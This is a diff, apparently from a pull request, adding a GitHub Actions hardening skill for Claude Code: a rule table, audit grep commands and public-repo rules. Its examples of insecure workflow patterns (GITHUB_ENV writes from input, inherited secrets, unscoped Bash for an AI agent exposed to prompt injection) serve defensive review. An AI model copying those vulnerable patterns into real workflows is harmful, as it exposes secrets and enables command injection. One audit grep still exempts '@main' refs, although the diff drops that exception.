+| Reusable-workflow caller with no `permissions:` block | Caller's read-only default clips callee's write requests → silent runtime failure (workflow logs green, side effect never happens) | Add top-level `permissions:` mirroring every scope the callee declares (e.g., `issues: write` for label-management callees) |
+| `pull-requests: read` on a workflow that comments on PRs (because the call "uses `issues.createComment`") | Commenting on a PR with the `GITHUB_TOKEN` needs `pull-requests: write` — `issues: write` does not cover PR comments; comment API returns 403 at runtime | Use `pull-requests: write` for PR comments; map scope by the target resource, not the API method's namespace (`issues: write` stays correct for issue comments) |
+| Downgrading an existing `write` scope to `read` during a least-privilege pass without checking the steps | The workflow may write to that resource at runtime (PR comments, label edits) → silent 403 | Only remove scopes the workflow does not use; read every step before narrowing an existing `write` |
+| Stripping `id-token: write` (or any scope) from a reusable-workflow caller because no caller step uses it | The callee may use it (e.g. OIDC cloud auth); caller caps callee, so a clipped `id-token` is rejected at run creation → `startup_failure` (no jobs, no logs) | Keep scopes a reusable-workflow caller passes through; verify against the callee's `permissions:` or keep + comment |
+| `gh pr review --approve` or `gh pr create` in a workflow when the org setting is off | Actions cannot create or approve PRs under that policy | Migrate approvals/creation to a dedicated GitHub App |
+| `allowed_tools: "Bash"` on Claude processing untrusted input | Prompt injection leads to unintended command execution | Scope: `Bash(gh:*)` |
+| `echo "$INPUT" >> $GITHUB_ENV` | Poisons environment for all subsequent steps | Use step-level `env:` instead |
+| `persist-credentials: true` (default) | Credentials in `.git/config` leak via artifacts | Set `persist-credentials: false` |
+| Long-lived cloud keys as secrets | High blast radius, no expiry | Use OIDC token exchange |

--- a/plugins/security-tools/skills/secure-github-actions/SKILL.md
+++ b/plugins/security-tools/skills/secure-github-actions/SKILL.md
@@ -3,7 +3,7 @@ name: secure-github-actions
 description: |
   Harden GitHub Actions workflows against supply-chain and injection attacks when
   creating, modifying, or reviewing a `.github/workflows/*.yml` file. Skip for
-  unrelated CI work (other CI providers, Playwright harness, dependency pinning)
+  unrelated CI work (other CI providers, test harnesses, dependency pinning)
   that does not touch a workflow YAML.
 metadata:
   keywords: github actions, workflow yaml, .github/workflows, expression injection, SHA pin, pull_request_target, claude-code-action
@@ -32,12 +32,15 @@ but the actual task is one of the below, **step aside**: say in a single line th
 rules here only apply to `.github/workflows/*.yml` edits and continue with the real task.
 Do not run the audit grep commands or the pre-PR checklist on unrelated code.
 
-- **Other CI providers** (e.g. `pipeline.yml`, `.buildkite/`, CircleCI config) — use that provider's tooling
-- **Playwright / e2e harness setup** that does not edit a workflow YAML
-- **Dependency pinning** in `package.json`, `pnpm-lock.yaml`, `Gemfile`, etc. — even
-  though supply-chain–adjacent, the rules below are about workflow YAML idioms
+- **Other CI providers** — any non-GitHub-Actions CI config (a Buildkite pipeline, a
+  CircleCI/GitLab/Jenkins config, etc.) — use that provider's own tooling
+- **Test / e2e harness setup** (Playwright, Cypress, or any framework) that does not edit a workflow YAML
+- **Dependency or lockfile pinning** in a package manifest of any language
+  (`package.json`, `Gemfile`, `pom.xml`, `go.mod`, `requirements.txt`, `Cargo.toml`, …) —
+  even though supply-chain–adjacent, the rules below are about workflow YAML idioms
 - **Generic CI investigation** with no workflow file change in scope
-- **Supply-chain questions about npm/pnpm/RubyGems** — use a package supply-chain scanner
+- **Package supply-chain questions** for any ecosystem (npm, RubyGems, Maven, Go modules,
+  PyPI, crates, …) — use a package supply-chain scanner
 
 If a workflow file is *also* in scope alongside one of the above, apply the rules
 to the workflow file and step aside for the rest.
@@ -117,27 +120,24 @@ which secrets the called workflow needs.
 # VULNERABLE — exposes ALL repo secrets to the called workflow
 jobs:
   notify:
-    uses: your-org/shared-workflows/.github/workflows/notify.yml@main
+    uses: your-org/shared-workflows/.github/workflows/notify.yml@9f8e7d6c5b4a39281706f5e4d3c2b1a09f8e7d6c # v2.3.1
     secrets: inherit
 
 # SAFE — only passes what's needed
 jobs:
   notify:
-    uses: your-org/shared-workflows/.github/workflows/notify.yml@main
+    uses: your-org/shared-workflows/.github/workflows/notify.yml@9f8e7d6c5b4a39281706f5e4d3c2b1a09f8e7d6c # v2.3.1
     secrets:
       SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
 ```
 
 **Why:** `secrets: inherit` passes every secret the caller has access to. If the
-called workflow's repo is compromised (pushed malicious code to `main`), every secret
-is exfiltrated. This is a well-documented real-world exfiltration path — incidents have
+called workflow is compromised, every secret is exfiltrated. This is a well-documented real-world exfiltration path — incidents have
 traced back to a single `secrets: inherit` repeated across many workflows.
 
 ### Rule 3: SHA-pin all action references
 
 Pin every `uses:` reference to a full commit SHA with a version comment.
-Only exception: trusted reusable workflows in a repo **you** control that has branch
-protection with required reviews (e.g. `your-org/shared-workflows@main`).
 
 ```yaml
 # VULNERABLE — mutable tag, can change without notice
@@ -337,7 +337,7 @@ Mirror every scope the callee declares at the caller's top level.
 # Workflow logs green; labelling silently fails.
 jobs:
   call-label-prs:
-    uses: your-org/shared-workflows/.github/workflows/label-prs.yml@main
+    uses: your-org/shared-workflows/.github/workflows/label-prs.yml@1a2b3c4d5e6f70819a2b3c4d5e6f70819a2b3c4d # v1.5.0
 
 # SAFE — caller grants what the callee needs.
 permissions:
@@ -345,7 +345,7 @@ permissions:
   issues: write
 jobs:
   call-label-prs:
-    uses: your-org/shared-workflows/.github/workflows/label-prs.yml@main
+    uses: your-org/shared-workflows/.github/workflows/label-prs.yml@1a2b3c4d5e6f70819a2b3c4d5e6f70819a2b3c4d # v1.5.0
 ```
 
 **You usually cannot see what the callee needs from the caller alone.** A reusable
@@ -371,7 +371,7 @@ permissions:
   contents: read
 jobs:
   upload-sbom:
-    uses: your-org/shared-workflows/.github/workflows/upload-sbom.yml@main
+    uses: your-org/shared-workflows/.github/workflows/upload-sbom.yml@c0ffee1234567890abcdef1234567890abcdef12 # v3.2.0
 
 # SAFE — keep id-token: write; the callee's OIDC step needs it.
 permissions:
@@ -379,7 +379,7 @@ permissions:
   id-token: write   # required by the reusable callee for OIDC cloud upload
 jobs:
   upload-sbom:
-    uses: your-org/shared-workflows/.github/workflows/upload-sbom.yml@main
+    uses: your-org/shared-workflows/.github/workflows/upload-sbom.yml@c0ffee1234567890abcdef1234567890abcdef12 # v3.2.0
 ```
 
 Note the two distinct failure modes: a clipped **`GITHUB_TOKEN`** scope (issues,
@@ -569,7 +569,6 @@ Run this against your workflow before submitting. Every item maps to a rule abov
 [ ] No ${{ }} expressions of any kind in run: blocks (Rule 1)
 [ ] No secrets: inherit — all secrets explicitly mapped (Rule 2)
 [ ] Every uses: reference is SHA-pinned with version comment (Rule 3)
-    Exception: a trusted reusable-workflow repo you control with branch protection
 [ ] All actions are on the org allowlist (Rule 4)
 [ ] Third-party actions replaced with native alternatives where feasible (Rule 4)
 [ ] Top-level permissions: block with least privilege (Rule 5)

--- a/plugins/security-tools/skills/secure-github-actions/references/audit-commands.md
+++ b/plugins/security-tools/skills/secure-github-actions/references/audit-commands.md
@@ -1,0 +1,50 @@
+# Quick Audit Commands
+
+Load this reference when auditing an existing set of workflows for violations of the rules in SKILL.md. Each command maps to a rule; run the ones relevant to the concern at hand.
+
+Scan existing workflows for violations:
+
+```bash
+# Any ${{ }} in run: blocks (all expressions, not just attacker-controlled)
+grep -rn 'run:' .github/workflows/*.yml | xargs -I{} grep -n '\${{' {} 2>/dev/null
+# More precise: find run: blocks and check for ${{ inside them
+for f in .github/workflows/*.yml; do
+  awk '/^[[:space:]]*run:[[:space:]]*\|/{flag=1;next} flag && /^[[:space:]]*[a-z]/{flag=0} flag && /\$\{\{/{print FILENAME":"NR": "$0}' "$f"
+done
+
+# secrets: inherit
+grep -rn 'secrets: inherit' .github/workflows/
+
+# Mutable action refs (not SHA-pinned)
+grep -rn 'uses:' .github/workflows/ | grep -v '@[a-f0-9]\{40\}' | grep -v '@main'
+
+# Missing permissions blocks
+for f in .github/workflows/*.yml; do
+  grep -q 'permissions:' "$f" || echo "MISSING permissions: $f"
+done
+
+# Reusable-workflow callers that lack a top-level permissions: block
+# (caller permissions cap callee permissions — missing block = callee silently
+# clipped to org default of read-only)
+for f in .github/workflows/*.yml; do
+  if grep -qE 'uses:.*\.ya?ml@' "$f"; then
+    grep -qE '^permissions:' "$f" || echo "REUSABLE CALLER missing top-level permissions: $f"
+  fi
+done
+
+# Unpinned npx
+grep -rn 'npx.*@latest\|npx -y ' .github/workflows/
+
+# PR creation or approval (fails if the org setting "Allow GitHub Actions to
+# create and approve pull requests" is off — migrate to a GitHub App)
+grep -rn 'gh pr review\|gh pr create\|pulls/.*/reviews' .github/workflows/
+
+# Unrestricted Bash in Claude actions
+grep -rn 'allowed_tools.*Bash[^(]' .github/workflows/
+
+# GITHUB_ENV/GITHUB_PATH writes with attacker input
+grep -rn 'GITHUB_ENV\|GITHUB_PATH' .github/workflows/
+
+# Missing persist-credentials: false (public repos)
+grep -rn 'actions/checkout' .github/workflows/ | grep -v 'persist-credentials'
+```

--- a/plugins/security-tools/skills/secure-github-actions/references/public-repo-rules.md
+++ b/plugins/security-tools/skills/secure-github-actions/references/public-repo-rules.md
@@ -1,0 +1,64 @@
+# Public Repository Rules (Rules 12-14)
+
+Load this reference when the workflow under review lives in a **public** repo. These three rules apply *in addition to* Rules 1-11 (which always apply); they are the extra hardening public exposure demands.
+
+**These rules apply only to public repos.** Before reviewing a workflow, check:
+```bash
+gh repo view --json visibility -q '.visibility'
+```
+If the result is `PUBLIC`, enforce Rules 12-14 in addition to Rules 1-11.
+
+### Rule 12: Living Off The Pipeline (LOTP) — no secrets on fork PR builds
+
+On public repos, `pull_request` workflows triggered by fork PRs should never
+have access to secrets when running linters, build tools, or security scanners.
+
+**Why:** Attackers submit PRs that modify tool config files (`.eslintrc`, `Makefile`,
+`.rubocop.yml`, `pyproject.toml`) containing code execution directives. When CI runs
+these tools, the malicious config executes with whatever permissions the workflow has.
+
+**Mitigations:**
+- Don't store secrets in workflows that run on `pull_request` from forks
+- Run build/lint/test steps in a separate job with `permissions: {}` (no token)
+- If secrets are needed, use a two-stage workflow: unprivileged build on fork PR,
+  privileged deploy only on merge to protected branch
+
+### Rule 13: Use `persist-credentials: false` on checkout
+
+In public repo workflows, always set `persist-credentials: false` on
+`actions/checkout` unless the job needs to push commits.
+
+```yaml
+- uses: actions/checkout@SHA # pinned
+  with:
+    persist-credentials: false
+```
+
+**Why:** By default, `actions/checkout` saves credentials in `.git/config`. If a
+subsequent step uploads artifacts or runs untrusted code, those credentials can be
+exfiltrated. `persist-credentials: false` removes them after checkout.
+
+### Rule 14: Require OIDC tokens over long-lived secrets for cloud auth
+
+For workflows that authenticate to AWS, GCP, or other cloud providers, prefer
+OIDC token exchange over long-lived access keys stored as secrets.
+
+```yaml
+# VULNERABLE — long-lived key, high blast radius if leaked
+env:
+  AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
+  AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
+
+# SAFE — short-lived token, scoped to this workflow run
+permissions:
+  id-token: write
+steps:
+  - uses: aws-actions/configure-aws-credentials@SHA
+    with:
+      role-to-assume: arn:aws:iam::ACCOUNT:role/github-actions
+      aws-region: us-east-1
+```
+
+**Why:** OIDC tokens are short-lived (minutes), scoped to a specific workflow run,
+and cannot be reused. Long-lived secrets persist until rotated and grant access to
+anyone who exfiltrates them.


### PR DESCRIPTION
### Why?

Continuing the effort to open-source broadly-useful, well-adopted Claude Code skills. `secure-github-actions` is a general-purpose GitHub Actions hardening reviewer with no organization-specific coupling — valuable to anyone running Actions.

### How?

Adds the `security-tools` plugin to the `fin-2x` marketplace:

- **secure-github-actions** — harden GitHub Actions workflows against supply-chain and injection attacks. A 14-rule review checklist (expression injection, SHA-pinning, least-privilege `permissions:`, `pull_request_target`, OIDC, and public-repo rules) plus a set of audit grep commands.
- **auto-inject hook** — a non-blocking `PostToolUse` hook that reminds Claude to load the skill whenever a `.github/workflows/*.yml` file is read or edited, so workflow changes get the hardening review automatically.

Ported from an internal Claude Code plugin collection; organization-specific action allowlists, incident references, and internal reusable-workflow examples were genericized. The original author is credited via `Co-Authored-By` trailers. Commit structure: one bootstrap commit, one for the skill, one for the hook, one marketplace-registration commit.

<sub>Generated with Claude Code</sub>